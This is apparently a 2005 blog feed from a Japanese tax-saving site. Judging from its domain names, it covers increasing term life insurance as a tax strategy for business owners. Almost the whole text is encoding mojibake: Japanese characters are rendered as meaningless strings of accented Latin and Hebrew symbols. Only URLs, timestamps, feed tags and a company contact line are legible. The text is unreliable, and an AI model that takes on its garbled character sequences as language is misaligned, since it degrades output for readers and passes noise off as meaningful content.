    ]]> -„ׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄ×
    -¡@ˆZת––‚ֹ‘¹‹אZ“‚ֽ‰ֲ”\‚©H@
    -„ׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄ×

    - -

    •¾׀‚ֵ‚א‘½‚­‚ּo‰cׂ—l‚ֹ‚²ˆ—p‚¢‚½‚¾‚¢‚ִ‚¨‚ט‚‚·u’‘’טת•¯v‚ֽA–@l‚×x•¥‚ֱ‚½”N•¥•¯—¿‚ּ‘Sz‚×A¡ת‚ּ‘¹‹א‚ֶ‚µ‚ִZ“‚ֵ‚«A5”Nװˆp‘±‚µ‚½ד‚ֵ‰נ–ס‚µ‚½ך‡‚ֹ‚ֽA•¥‘z‚ּ90“‚נ’´‚¦‚י‰נ–ס•װ–‹א‚×–@l‚ֹ–‚ֱ‚ִ‚«‚‚·B‚ֲ‚‚טA””N“א‚ֹ‰נ–ס‚·‚י‚±‚ֶ‚נ‘O’ס‚ֶ‚µ‚ִˆ—p‚³‚ך‚ִ‚¢‚יƒP[ƒX‚ׂ‚ֶ‚ס‚ַ‚ָ‚ּ‚ֵ‚·B

    - -

    »‚ּ–@lְרֵ—¦‚ֽ40.87“II‚ֲ‚‚טA—˜‰v‚ּ–ס4„‚נֵ‹א‚ֶ‚µ‚ִ”[‚‚½דA‰ן׀‚ֹc‚י“א•”—¯•‚ֽc‚ט‚ּ6„‚ֵ‚·B‚ֶ‚±‚כ‚×A‚»‚ּ—˜‰v‚נu’‘’טת•¯v‚ֹ““‚·‚ך‚־A9„‚ּ‘‹א‚נ—¯•‚ֵ‚«‚י‚±‚ֶ‚ֹ‚ָ‚י‚ֶ‚¢‚₪‚ם‚¯‚ֵ‚·B

    - -

    ‚±‚ּu’‘’טת•¯v‚בSz‘¹‹אZ“‚נ”F‚‚ח‚ך‚ִ‚¢‚י׋’‚ֽA–@lֵמ–{’’B9-3-5‚¨‚ז‚ׁ‰–@2-3‚ֶ‚¢‚₪’’B‚ֹ‚ז‚ט‚‚·B‚±‚ּ’’B‚ֵ‚ֽA_–ס‚ּ”N—מ‚ֶ’ט‚·‚י•¯תװ‚ֹ‚ז‚ֱ‚ִ•¯—¿‚ּ‘Sz‚נ‘¹‹אZ“‚ֵ‚«‚י|‚×–¾‹L‚µ‚ִ‚ ‚ט‚‚·B

    - -

    ‚ֵ‚ֽAˆZת––‚ֹu”N•¥•¯—¿‚ּ‘Sz‚נ‘¹‹א‚ֹZ“v‚׉ֲ”\‚ָ‚ּ‚ֵ‚µ‚ו‚₪‚©H–{—ˆ‚ָ‚ח‚־A‚»‚ּ12•ּׂ1‚ּ‹אz‚סת‚ּ‘¹‹א‚ֹ‚ָ‚טAc‚ט‚ֽo‰”‚ֹˆֲ•ׂµ‚ִ‘¹‹אZ“‚ֹ‚ָ‚י‚ּ‚ֵ‚ֽ‚ָ‚¢‚©H‚ֶ‚ּ‹^–ג‚א‚ ‚י‚ֵ‚µ‚ו‚₪B

    - -

    ‚µ‚©‚µ‚±‚¿‚ח‚ֹײ‚µ‚ִ‚אAמ–{’’B2-2-14A’Zת‚ּ‘O•¥”ן—p‚ֶ‚µ‚ִ”N•¥•¯—¿‚ּ‘Sz‚נ¡ת‚ּ‘¹‹א‚ֹZ“‚ֵ‚«‚י‚ֶ–¾‹L‚µ‚ִ‚¢‚‚·B

    - -

    ‚‚½ְ–±–‚ֶ‚µ‚ִA—ב‚¦‚־ˆZת––‚‚ֵc‚·‚ֶ‚±‚כ”“ת‚ֵA‰‚½‚µ‚ִ•¯‰ֱ“‚ֽ‰ֲ”\‚ָ‚ּ‚©H‚ֶ‚¢‚₪‚±‚ֶ‚ׂ ‚ט‚‚·B

    - -

    “‚¦‚ֽA\‘E’Nf’fE•¯—¿‚ּx•¥‚¢‚³‚¦“–“א‚ֹֿ‚‚¹‚ך‚־A‹ֹ’[‚ֹ¾‚¦‚־1“ת‚ֵט‘±‚«‚ֵׂ‚«‚‚·B

    - -

    -------------------------------------------------------------------

    - -

    @’‘’טת•¯‚ּ‹ן‘ּ“I‚ָƒVƒ~ƒ…ƒ[ƒVƒ‡ƒ“‚נ–³—¿ל¬‚¢‚½‚µ‚‚·B

    - -

    @‚¨–ג‚¢‡‚ם‚¹‚ֽ‚±‚¿‚ח
    -@ƒz[ƒ€ƒy[ƒW‚©‚ח@http://www.teizouteiki.jp/contact.html
    -@ƒ[ƒ‹‚ֵ@info@businessnetwork.co.jp
    -@‚s‚d‚k@03-3517-2036@’S“–Fֲ“c

    - -

    -------------------------------------------------------------------

    - -

    „ׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄ×
    -¡@s‚«‰‚¬‚½sˆ׳‚ֽ‘¹‹א‚ּ””FI
    -„ׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄ×

    - -

    ‚µ‚©‚µA‰½–‚ֹ‚א“x‚ֶ’ˆ׃‚וK—v‚ֵ‚·Bד‹L‚ֵּר‰‚ֽ‚ ‚­‚‚ֵ‚א–נˆץ•¯‚ּu•›“Iר‰v‚ֶ‚µ‚ִ‘¶‚µ‚ִ‚¢‚י‚±‚ֶ‚בO’ס‚ֵ‚·B•¯‰ֱ“‚ּו–“I‚×uֵv‚ֹ‚ ‚ֱ‚½‚ּ‚ֵ‚ֽAu“¯‘°–@l‚ּsˆ׳vZ‚ּ””Fv‚ֶ‚µ‚ִA•¯—¿‚נ‘¹‹א‚ֹZ“‚·‚י‚±‚ֶ©‘ּ‚×””F‚³‚ך‚ִ‚µ‚‚₪ך‡‚ׂ ‚ט‚‚·B

    - -

    “¯‘°–@l‚ּ“ֱ—ב‚ֹמ‚ֳ‚­ˆ’u‚ֵ‚·‚×A‚±‚ך‚נ”נ‚¯‚י‚½‚‚ֹ‚ֽA‚‚¸ƒˆ‚ֹ•¯–{—ˆ‚ּ–“I‚ֵ‚ ‚יAu–נˆץ‚ּ•בv‚ֶ‚µ‚ִ“¢‚·‚י‚±‚ֶ‚וK—v‚ֶ‚ָ‚ֱ‚ִ‚«‚‚·B

    - -

    ‘¼‚ּ‰ֱ“’†‚ּ•¯‚א‚u‰‘ו‚ָ•בv‚ֶ‚ָ‚ֱ‚ִ‚¢‚ָ‚¢‚©B“ֱ’ט‚ּ–נˆץ‚¾‚¯‚ּu•־‚ֱ‚½‰ֱ“v‚ֶ‚ָ‚ֱ‚ִ‚¢‚ָ‚¢‚©B‚»‚ּ•ב‚וK—v‚ֵ‚ ‚י׋’‚ֶ‚µ‚ִ‚ּu–נˆץ‘E‹א‹K’טv‚גuי‹ֶ–h‰q‘‹א‚ּvZv‚נ‚«‚¿‚ס‚ֶ‚µ‚ִ‚¢‚י‚©‚ָ‚ַ‚נƒ`ƒFƒbƒN‚µ‚½ד‚ֵAך–ו‰ֶ‚ֹ‚אƒAƒhƒoƒCƒX‚µ‚ִ‚א‚ח‚¢‚‚µ‚ו‚₪B

    - -

    ‚א‚₪‚׀‚ֶ‚ֲ‚ּƒ|ƒCƒ“ƒg‚ֽA‰נ–ס‹א‚ּ‘‹אg“r‚ֵ‚·B‰נ–ס•װ–‹א‚ֽA‘¹‹אZ“‚µ‚ִ’~ֿ‚³‚ך‚½‚א‚ּ‚ֵ‚ ‚יˆָדA‰נ–ס‚ּ‚ֹ‚ֽ‚·‚׳‚ִuG“v‚ֶ‚µ‚ִ–‚ֱ‚ִ‚­‚י‚א‚ּ‚ֵ‚·B‚±‚±‚ֵ’P‚ֹ“¾‚ֶ‚µ‚½‚ּ‚ֵ‚ֽ‰½‚ּר‰‚א‚ָ‚¢A‚ֶ‚¢‚₪‚ז‚ט‚א‚‚µ‚כ‚ג‚ח‚ָ‚¢•‚×—ַ‚©‚ֱ‚½‚ֶ‚¢‚₪–‚ֹ‚א‚ָ‚ט‚©‚ֻ‚‚¹‚סB

    - -

    ‚ּ–‹ֶ“WJ‚ּ‘‹א‚ג–נˆץ‘E‹א‚ָ‚ַA‘‹אg“r‚ֹ‚ֲ‚¢‚ִ‚א–‘O‚ֹ\•ֹׂ“¢‚µ‚ִ‚¨‚­•K—v‚ׂ ‚ט‚‚·B

    - -


    -‘¼‚ּ’‘’טת•¯‚ֹײ‚·‚י‹L–‚ֽ‚±‚¿‚ח‚נ‚²——‚­‚¾‚³‚¢B

    - -

    “א—e‚ֹ‚ֲ‚¢‚ִ‚ּ‚¨–ג‚¢‡‚ם‚¹‚ֽ‚±‚¿‚ח‚‚ֵ
    -@@@@@@@@@@@@@@@@@@@@@@@@@

    ]]> -
    -
    - -o‰cׂ‚ּ•¯E’‘’טת•¯‚ּˆ—p–@‚ֶ‚ֽ - -2005-04-27T01:30:20Z -2005-04-21T00:31:23Z -tag:setsuzei119.jp,2005://1.163 -2005-04-21T00:31:23Z -’‘’טת•¯‚ּˆ—p–@‚נ‚‚ֶ‚‚‚µ‚½Bo‰cׂ‚ֹ‚ֶ‚ֱ‚ִ’‘’טת•¯‚ּ‰ֱ“‚ֽƒƒƒbƒg‚ׂ ‚ט‚‚·B - -b-admin - - - -’‘’טת•¯ - -‚‚¸A‚ ‚ָ‚½‚ּ‰ן׀‚ֵ¡ת‚ּˆZ‚×A‚א‚₪װ‹‚ֹ”—‚ֱ‚ִ‚¢‚יo‰cׂ‚¯‚ּט’i‚ֶ‚µ‚ִAy‚‚ֶ‚‚ִ—˜‰v‚נֱ‚·z‚ֹ‚ֽA‰÷‹L‚ּ•–@ט’i‚µ‚©‚ ‚ט‚‚¹‚סB

    - -

    Eֵ‹א‘־‚ֵ‚ֽ‚ָ‚¢i‘¹‹אZ“‚×o—ˆ‚יjg’‘’טת•¯h‚ֵ—˜‰v‚נ‘Szo”ן‰»‚µ‚‚·B

    - -

    Eת––‚ֹ“–ת—˜‰v‚ׂ ‚י’צ“xm’ט‚µ‚½ד‚ֵy”N•¥‚¢z‚ֵ’‘’טת•¯‚ֹ‰ֱ“‚µ‚‚·B

    - -

    E”N•¥‚¢‚µ‚½’‘’טת•¯‚ּ•¯—¿‚ֽA’Zת‘O•¥‚¢”ן—p‚ֶ‚µ‚ִ‘Sz“–ת‚ּo”ן‚ֶ‚·‚יB

    - -

    E2”N–ˆָ~‚אAת––‚ּ—˜‰vף‹µ‚נ©‚ָ‚ׂחA‚¨x•¥•–@‚נ”N•¥‚¢‚©‚חA•¥‚¢‚ֹ•ֿX‚µ‚½‚טAx•¥‚¢‚נ—‚A‚א‚µ‚­‚ֽ—‚X‚ֹז‘—‚ט‚·‚ך‚־—‚ת‚ּo”ן‚ֹ‚ָ‚ט‚‚·B

    - -

    E’‘’טת•¯‚ּ•¯—¿‚ּx•¥‚¢‚ׂ«‚ֲ‚¢ך‡‚ֹ‚ֽA€–S•בz‚נ¸z‚·‚י‚±‚ֶ‚ֵAx•¥‚¢•¯—¿‚א¸z‚³‚ךA‰נ–ס•װ–‹א‚ֹ‚ֽ‚‚ֶ‚ס‚ַ‰e‹¿‚µ‚‚¹‚סB

    - -


    -ד‹L‚ֽAˆZ‚נ}‚¦‚י‘O‚ֹ‚ג‚י‚±‚ֶ‚ֵ‚·‚×A’†E’·ת“I‚ָo‰cם—ׂנ“¥‚‚¦‚‚·‚ֶAƒLƒƒƒbƒVƒ…ƒtƒ[‚נ‚ֹ‚³‚¹‚י‚±‚ֶ‚×A‘ו״‚ֵ‚·B

    - -

    –‚׈ך‚ֹA‘‹אJ‚ט‚׈«‰»‚µ‚½ך‡‚נ‘z’ט‚µ‚ִ‚¨‚­•K—v‚ׂ ‚ט‚‚·B

    - -


    -‚»‚±‚ֵA¡ת‚ֹy‚‚ֶ‚‚ֱִ‚³‚ך‚½—˜‰vz‚נƒXƒgƒbƒN‚µ‚ִ‚¨‚­‚±‚ֶ‚ֵAµ‚µ‚¢‚ֶ‚«‚נז‚ט‰z‚¦‚י‚±‚ֶ‚ֵׂ‚«‚י‚ּ‚ֵ‚·B

    - -

    ¥’‘’טת•¯‚נˆ—p‚µ‚½ƒLƒƒƒbƒVƒ…ƒtƒ[‰‘P‚ֶ‚ֽ¥
    - http://www.teizouteiki.jp

    - -

    ‘±‚«‚ֹ‚א’‘’טת•¯‚ּˆ—p–@‚ב‚©‚ך‚ִ‚¢‚‚·B

    ]]> -E‰נ–ס•װ–—¦‚ּƒs[ƒN(5”N–`10”N–‚ב½‚¢j‚ֹ’‘’טת•¯‚נ‰נ–ס‚·‚י‚ֶA‰נ–ס•װ–‹א‚׉ן׀‚ֹƒLƒƒƒbƒVƒ…‚ֵU‚ט‚‚ך‚‚·B

    - -

    EU‚ט‚‚ך‚½‰נ–ס•װ–‹א‚ֽAy‘SzG“z‚ֶ‚µ‚ִ—˜‰vvד‚µ‚‚·B

    - -

    E‚»‚ּת‚×װ‚ֵ‚ ‚ך‚־װ‚ּ–„‚‚ֵׂ‚«‚‚·‚µAֵ‚א‘½‚¢g‚ם‚ך•‚ֶ‚µ‚ִAw–נˆץ‘E‹אx‚ֶ‚µ‚ִף‚¯ז‚יƒP[ƒX‚ב½‚¢‚ֵ‚·B

    - -

    E‰נ–ס‚¹‚¸‚ֹ•¯—¿‚ּx•¥‚¢‚נ’†~‚µA•¥‚¢ֿ‚•¯iIg•¯j‚ֹ•ֿX‚·‚י‚±‚ֶ‚א‚ֵ‚«‚‚·B

    - -

    Eo‰cׂ‚ּך‡A‘E‚ֶ‚¢‚ֱ‚ִ‚א•×¶•ֿXi׀’·‚©‚ח‰ן’·‚ֹ‚ָ‚יj‚נ—˜—p‚µA‘E‹א‚נ2‰ס‚ֶ‚י‚±‚ֶ‰ֲ”\‚ֵA‚±‚ּ‚ג‚ט•‚׉₪“¹IH‚ֵ‚·B

    - -

    E׀’·‚ּ‰‚³‚ס‚×–נˆץ‚ּך‡‚ֹ‚ֽAז‚ֹ‰‚³‚ס‚נ‘E‚³‚¹‚ִ‘ו‚«‚­‘E‹א‚נx•¥‚ֱ‚ִ‚¨‚­‚±‚ֶ‚א‚ֵ‚«‚‚·B

    - -

    E‘E‹א‚ֽAֵ–±ד‚ ‚יˆך’ט‚ּ”ֽˆֽ“א‚ֵ‚ ‚ך‚־Ao”ן‚ֶ‚µ‚ִx•¥‚₪‚±‚ֶ‚׉ֲ”\‚ֶ‚ָ‚ט‚‚·B

    - -

    @‰¼‚ֹ—˜‰v1,000–‰~‚ּ‰ן׀‚×5,000–‰~‚ּ‘E‹א‚נx•¥‚¢‚‚·‚ֶA4,000–‰~ ‚ּװ‚ֹ‚ָ‚ט‚‚·B

    - -

    E»‹א‚ּֿ‚—§‚ִ‚ֵֽˆר‚«ד‚ּ—˜‰v‚ֵ‚ ‚ט‚‚·‚×A‘Sz‘¹‹א‚ּ’‘’טת•¯‚ֵ‚ ‚ך‚־Aֵˆר‚«‘O‚ּ—˜‰v‚©‚ח@‚»‚ּ‚‚ֿ‚—§‚ִ‚י‚±‚ֶ‚׉ֲ”\‚ֵ‚·B

    - -

    @‚»‚ך‚נ‘E‚ֹ—˜‰v‚ֶ‚µ‚ִ•\–‰»‚³‚¹‚ִA‘E‹א‚ֶ‚¢‚₪o”ן‚ֵx•¥‚₪‚±‚ֶ‰ֲ”\‚ֹ‚ָ‚י‚ּ‚ֵ‚·B

    - -


    -‘¼‚ּ’‘’טת•¯‚ֹײ‚·‚י‹L–‚ֽ‚±‚¿‚ח‚נ‚²——‚­‚¾‚³‚¢B

    - -

    ¥’‘’טת•¯‚נˆ—p‚µ‚½ƒLƒƒƒbƒVƒ…ƒtƒ[‰‘P‚ֶ‚ֽ¥
    - http://www.teizouteiki.jp
    -

    ]]> -
    -
    - -’‘’טת•¯‚ֹ‚ֲ‚¢‚ִo‰cׂ‚ּכ‰נ - -2005-04-27T01:28:46Z -2005-04-20T05:24:44Z -tag:setsuzei119.jp,2005://1.162 -2005-04-20T05:24:44Z -’‘’טת•¯‚ֹ‚ֲ‚¢‚ִ‚ּo‰cׂ‚ּכ‰נ‚נ‰נא‚µ‚‚·B - -b-admin - - - -’‘’טת•¯ - -o‰cׂ‚ּ•‚×’‘’טת•¯‚ֹ‚ֲ‚¢‚ִכ‰נ‚נ‚³‚ך‚ִ‚¢‚י“_‚ׂ ‚ט‚‚·B
    -“¾‚©A‚»‚ך‚ֶ‚א‘¹‚©A‚»‚ּכ‰נ‚ֹ‚ֲ‚¢‚ִ‰נא‚³‚¹‚ִ‚¢‚½‚¾‚«‚‚·B

    - -

    ‚PD’‘’טת•¯‚ּ|‹א‚בSz–‚ֱ‚ִ‚±‚ָ‚¢‚ּ‚ֵ‚ג‚ֽ‚ט‘¹‚נ‚·‚י‚ּ‚ֵ‚ֽH‚ֶv‚ֱ‚ִ‚¢‚י“_B

    - -

    –@l‚ֵƒLƒƒƒbƒVƒ…‚נֿ‚—§‚ִ‚יך‡Aֵˆר‚«ד‚ּ—˜‰v‚ֵ‚ ‚י‚±‚ֶ‚©‚חA»‹א‚ּֿ‚—§‚ִ‚ֽ—Lֵ‚ּˆר‚«“–‚ִ‚ֶ‚¢‚₪‚±‚ֶ‚ֹ‚ָ‚ט‚‚·B
    -–@lֵ—¦‚×–ס50“‚ֶ‚·‚ך‚־Aֿ‚—§‚ִ‚½»‹א‚ֶ“¯z‚ֵּ‹א‚נx•¥‚ֱ‚½‚±‚ֶ‚ֹ‚ָ‚י‚ּ‚ֵ‚·B

    - -

    ‚»‚ּ“_A’‘’טת•¯‚נ—p‚¢‚ך‚־•¯—¿‚ֽ‘Sz‘¹‹אZ“‚ֵ‚«‚י‚ּ‚ֵAֵˆר‚«‘O‚ּ—˜‰v‚נ‘Sz‚»‚ּ‚‚ֿ‚—§‚ִ‚י‚±‚ֶ‚ֶ“¯‚¶ר‰‚ד¾‚ח‚ך‚‚·B

    - -

    ‚·‚ָ‚ם‚¿A‰½‚א‘־פ‚נ‚µ‚ָ‚©‚ֱ‚½ך‡‚ֶ”הr‚·‚י‚ֶ‰נ–ס•װ–—¦‚×50“‚נ’´‚¦‚ך‚־A’‘’טת•¯‚ֹ‰ֱ“‚µ‚½‚‚₪‚ב½‚­‚ּƒLƒƒƒbƒVƒ…‚נc‚¹‚י‚±‚ֶ‚ֹ‚ָ‚ט‚‚·B

    - -

    ‚±‚ּ—‹‚ׂם‚©‚ח‚ָ‚¢o‰cׂ‚׈׃O‚ֶ‘½‚¢‚ּ‚ֵ‚·B
    -

    ]]> -‚QD’‘’טת•¯‚ּ‰נ–ס•װ–‹א‚ֽG“‚ֶ‚µ‚ִ—˜‰vvד‚·‚י‚×A‚»‚ּ“_‚ֵ‰ֵ‚³‚ך‚י‚ּ‚ֵˆ׃–¡‚ָׂ‚¢‚ֶv‚ֱ‚ִ‚¢‚יo‰cׂ‚ב½‚¢“_B

    - -

    ‚±‚ך‚ֹ‚ֲ‚¢‚ִ‚ֽA’‘’טת•¯‚ּ‰נ–ס•װ–‹א‚ּG“i—˜‰vj‚נ‘E‹א‚ֶ‚¢‚₪io”ןj‚ֵx‹‹‚·‚י‚±‚ֶ‚ֵ‘E‚·‚יט–@‚׈ך”“I‚ֵ‚·B
    -‚ֵ‚אAב‚¢o‰cׂ‚ּ•‚ֹ‚ֽ‘E‚ׂ‚¾ז‚ָ‚ּ‚ֵ‚±‚ּט–@‚ֹ‚אƒsƒ“‚ֶ‚±‚ָ‚¢l‚א‘½‚¢‚ֵ‚·B

    - -

    ‰v‹א‚ֶ‚µ‚ִֵ‹א‚נ•¥‚ֱ‚½‚ּ‚ֵ‚ֽA‰½‚ּ‚½‚‚ֹ’‘’טת•¯‚ֹ‰ֱ“‚µ‚½‚ּ‚©‰נ‚ח‚ָ‚­‚ָ‚ֱ‚ִ‚µ‚‚¢‚‚·B

    - -

    ’‘’טת•¯‚ּ‰נ–ס‚ֹ‚¨‚¢‚ִA‚ָ‚ֹ‚א‘S•”‰נ–ס‚·‚י•K—v‚ֽ‚ ‚ט‚‚¹‚סB

    - -

    ‰נ–ס‚ּ•–@‚ֶ‚µ‚ִ‘S•”‰נ–ס‚ֶˆך•”‰נ–ס‚ׂ ‚טA””N‚ֹ•ׂ¯‚ִˆך•”‰נ–ס‚µ‚ִ‰נ–ס•װ–‹א‚נז‚ט•צ‚µ‚ִ‚ה‚«A‚»‚ּ‰נ–ס•װ–‹א‚נ•¯—¿‚ֹ[‚ִ‚ִAV‚½‚ֹ’‘’טת•¯‚ֹ‰ֱ“‚³‚ך‚ִ‚ֽ‚¢‚©‚ֵׂ‚µ‚ו‚₪‚©Bi•¯—¿‚ֽ‘¹‹אZ“‚ֵ‚«‚‚·Bj

    - -

    ‚א‚¿‚כ‚סװ‚ּ‚ֶ‚«‚ֽ‰נ–ס‚ּגD‚ּƒ^ƒCƒ~ƒ“ƒO‚ּ‚׀‚ֶ‚ֲ‚ֵ‚·B
    -‹‹}–‹ֶ‘‹א‚ֶ‚µ‚ִ‚²ˆ—p‚­‚¾‚³‚¢B

    - -


    -‚RD‰‹‚ֹ‚א’‘’טת•¯‚ֹW‚ם‚יֵ§‚ּ‰³‚ׂ ‚ֱ‚½‚×A«—ˆֵ§‰³‚ֵƒƒƒbƒg‚ָׂ‚­‚ָ‚י‰ֲ”\«‚א‚ ‚י‚ּ‚ֵ‚ג‚ֱ‚ִ‚אˆ׃–¡‚ָׂ‚¢‚ּ‚ֵ‚ֽA‚ֶv‚ֱ‚ִ‚¢‚יo‰cׂ‚ב½‚¢“_B

    - -

    «—ˆֵ§‰³‚ׂ ‚י‚©‚א‚µ‚ך‚ָ‚¢‚ּ‚ֽA‚ַ‚ּ•¯‚ֵ‚א‚ ‚ט‚¦‚י‚±‚ֶ‚ֵ‚ ‚טA‰¼‚ֵֹ§‰³‚ֹ‚ָ‚ֱ‚½‚ֶ‚µ‚ִ‚א‰ֱ““_‚‚ֵ‘k‚ֱ‚ִ•ֿX‚נ‹‚‚ח‚ך‚י‚±‚ֶ‚ֽ‚ָ‚¢‚ּ‚ֵA‚‚µ‚כA’‘’טת•¯‚ֹ‰ֱ“‚ֵ‚«‚י‚₪‚¿‚ֹ“±“‚µ‚½‚‚₪‚ׂ¢‚¢‚ֶv‚¢‚‚·B

    - -

    ‚א‚¿‚כ‚סA’‘’טת•¯‚ֽ•¯‚ֵ‚·‚ּ‚ֵA‘־ׂ‚ֹ–‚׈ך‚ּ‚±‚ֶ‚ׂ ‚ֱ‚½ך‡‚ֹ‚ֽ•¯‹א‚נ‚¨ףז‚ט‚ֹ‚ָ‚י‚±‚ֶ‚ֵׂ‚«‚‚·B

    - -


    -‘¼‚ּ’‘’טת•¯‚ֹײ‚·‚י‹L–‚ֽ‚±‚¿‚ח‚נ‚²——‚­‚¾‚³‚¢B

    - -

    ’‘’טת•¯‚ֹ‚ֲ‚¢‚ִ‚µ‚¢“א—e‚ֽ‚±‚¿‚ח‚נ‚²——‚­‚¾‚³‚¢B

    - -

    ‚‚½’‘’טת•¯‚ֹ‚ֲ‚¢‚ִ‚ּ‚¨–ג‚¢‡‚ם‚¹‚ֽ‚±‚¿‚ח‚‚ֵ‚¨ט‚¢‚µ‚‚·B

    ]]> -
    -
    - -Z•\‚ּ‚ַ‚±‚ֹ’–‚·‚׳‚«‚©H - -2005-04-12T01:16:14Z -2005-04-12T01:03:48Z -tag:setsuzei119.jp,2005://1.161 -2005-04-12T01:03:48Z -o‰cׂ‚׉ן׀‚נ‘¶‘±‚³‚¹‚יד‚ֵl‚¦‚ָ‚­‚ִ‚ֽ‚ָ‚ח‚ָ‚¢‚±‚ֶ‚ֽ - -b-admin - - - -©ָ‘–{`¬ - -“תX‘ו•ֿ‘½‚­‚ּo‰cׂ—l‚ֶ‚¨‰ן‚¢‚³‚¹‚ִ‚¢‚½‚¾‚¢‚ִ‚¨‚ט‚‚·‚×Ao‰cׂ‚ֹ‚א‚¢‚כ‚¢‚כ‚ָƒ^ƒCƒv‚ּ•‚ׂ¢‚ח‚ֱ‚µ‚ב‚¢‚‚·B

    - -

    ‚½‚ֶ‚¦‚־AX‚ּZ•\‚ּ‚ַ‚±‚ֹ’–‚µ‚ִ‚¢‚י‚©A‚ֶ‚¢‚₪‚±‚ֶ‚ֹ‚אo‰c•j‚ָ‚ט׀’·‚ּl‚¦•‚×»‚ך‚‚·B

    - -

    Z•\‚ּ‚ַ‚±‚ֹ’–‚µ‚ִ‚¢‚י‚©‚ֶ‚¢‚¦‚־A”¼”ˆָד‚ּo‰cׂ‚ֽy”„דz‚ֵ‚·B‚±‚ך‚ד–‘R‚ֶ‚¢‚¦‚־“–‘R‚ָ‚ּ‚ֵ‚·‚×A׀’·‚²©g‚ֵ‚א”סם‚ֹ‰c‹ֶ—ֽ‚ּ‚ ‚יƒ^ƒCƒv‚ּ•‚ב½‚¢‚ז‚₪‚ֵ‚·B

    - -

    ‚»‚ּ‚ג‚גד‚ּo‰cׂ‚ֹ‚ָ‚י‚ֶy—˜‰vz‚ֹ’–‚µ‚‚·B

    ]]> -‚ֵ‚ֽA”­‚ָ‚¢o‰cׂ‚ֽ‚ֶ‚¢‚₪‚ֶ‚³‚ח‚ֹyƒLƒƒƒbƒVƒ…ƒtƒ[z‚ֹ’–‚µ‚ִ‚¢‚‚·B

    - -

    ’N‚×l‚¦‚½‚ֱ‚ִAֵI“I‚ֹ‰ן׀‚נח‚י‚א‚ּ‚ֽyƒLƒƒƒbƒVƒ…z‚ֵ‚·B

    - -

    o‰cׂ‚ּ׃–±‚ֶ‚µ‚ִ‚א‚ֱ‚ֶ‚א‘ו‚«‚ָ‚א‚ּ‚ֽA

    - -

    ¡‰ן׀‚נ‘¶‘±”­“W‚³‚¹‚י‚±‚ֶ

    - -

    ¡ג‘־‚ֹ‚ֲ‚װ‚³‚ָ‚¢‚±‚ֶ

    - -

    ‚ֹ‚ ‚ט‚‚·‚×A”„ד‚×L‚ׁ‚ִ‰ן׀‚ד|Y‚µ‚ִ‚µ‚‚₪‚±‚ֶ‚ָ‚ַ‚ֽ’¿‚µ‚­‚א‚ָ‚­A•‚ֵ‚ ‚ֱ‚ִ‚א‰ן׀‚ֽ“|Y‚·‚י‚א‚ּ‚ֵ‚·B

    - -

    ‚µ‚©‚µAƒLƒƒƒbƒVƒ…ƒoƒ‰ƒ“ƒX‚×’‘S‚ָ‰ן׀‚ֽג‘־‚ֹ“|Y‚µ‚‚¹‚סB

    - -

    ---------------------------------------------------------------------

    - -

    @ך–ו‰ֵֶ—m‚ֹ‚ז‚י–³—¿‘’kְ{’†‚ֵ‚·II

    - -

    @‚¨–ג‚¢‡‚ם‚¹‚ֽ‚±‚¿‚ח
    -@ƒz[ƒ€ƒy[ƒW‚©‚ח@http://www.businessnetwork.co.jp/HTM/i-4.html
    -@ƒ[ƒ‹‚ֵ@info@businessnetwork.co.jp
    -@‚s‚d‚k@03-3517-2036@’S“–Fֲ“c

    - -

    ---------------------------------------------------------------------

    - -


    -o‰cׂ‚ּ’†‚ֹ‚ֽA‚ֶ‚ֹ‚©‚­”„ד‚נד‚°‚³‚¦‚·‚ך‚־‚¢‚¢‚ּ‚¾A‚ֶ‚¢‚₪ֵ’טֿ”O‚ּ‚ז‚₪‚ָ‚א‚ּ‚×A‚ָ‚©‚ָ‚©‚‚®‚¢‚³‚ך‚ָ‚¢l‚א»ְ‚ֹ‚ֽ‚¢‚‚·B

    - -

    ”„ד‚ב‚¦‚ך‚־—˜‰v‚א‘‚¦‚יA—˜‰v‚ב‚¦‚ך‚־‘‹א‚א‘‚¦‚יA‚ֶ‚¢‚₪l‚¦•‚ׂ½‚¢‚µ‚½‹^–ג‚א‚ָ‚­M‚¶‚ח‚ךA—˜‰v‚³‚¦o‚µ‚ִ‚¢‚ך‚־»‹א‚ֽc‚י‚ֽ‚¸‚¾A‚ֶ‚¢‚₪כ‚ֱ‚½”F¯‚×”™‘R‚ֶ‘¶‚·‚י‚©‚ח‚ֵ‚·B

    - -

    ‚ֵ‚·‚©‚חy‰½‚ֵ—˜‰v‚×o‚ִ‚¢‚י‚ּ‚ֹ»‹א‚ָׂ‚¢‚ּ‚¾IIz‚ֶ‚¢‚₪˜b‚ס‚א‚ָ‚­‚ָ‚ח‚ָ‚¢‚ם‚¯‚ֵ‚·B

    - -

    ”„ד—˜‰v‘‹א‚ֹ‹^–ג‚נ‚¿A‚»‚ּכ‚ט‚ֹ‹C‚ֲׂ‚¢‚ִA‚¢‚©‚ֹ»‹א‚נc‚·‚©‚ֶ‚¢‚₪ֿ“_‚ֹ—§‚ִ‚־A”ץ“‘A”[ֵAַֹ—Ad“‚ך‚ג‘‹א‰ס‚ֹ‚אˆך‚ֲ‚ּo‰cv‘zAם—×A•–@˜_‚ֶ‚¢‚ֱ‚½‚א‚ּ‚וK—v‚ֹ‚ָ‚י‚ֽ‚¸‚ֵ‚·B

    - -


    -ƒLƒƒƒbƒVƒ…ƒtƒ[o‰c‚ָ‚י‚א‚ּ‚×ו’£‚µ‚ִ‚¢‚י‚ּ‚ֽA‚‚³‚ֹ‚±‚ּ‚±‚ֶ‚ֵ‚א‚ ‚י‚ם‚¯‚ֵ‚·B

    - -

    - -

    @@@@@@@@@@@@@@@@@@@@@@@@@`‰ס‚ֹ‘±‚­`

    - -


    -‰ס‚ֽA‚S‚P‚T“תi‹אj‚ֹƒƒ‹ƒ}ƒK”zM‚נ—\’ט‚µ‚ִ‚¨‚ט‚‚·B

    - -


    -ƒƒ‹ƒ}ƒKƒoƒbƒNƒiƒ“ƒo[‚ֽ‚±‚¿‚ח
    -@http://setsuzei119.jp/archives/cat5/cat23/index.html

    - -

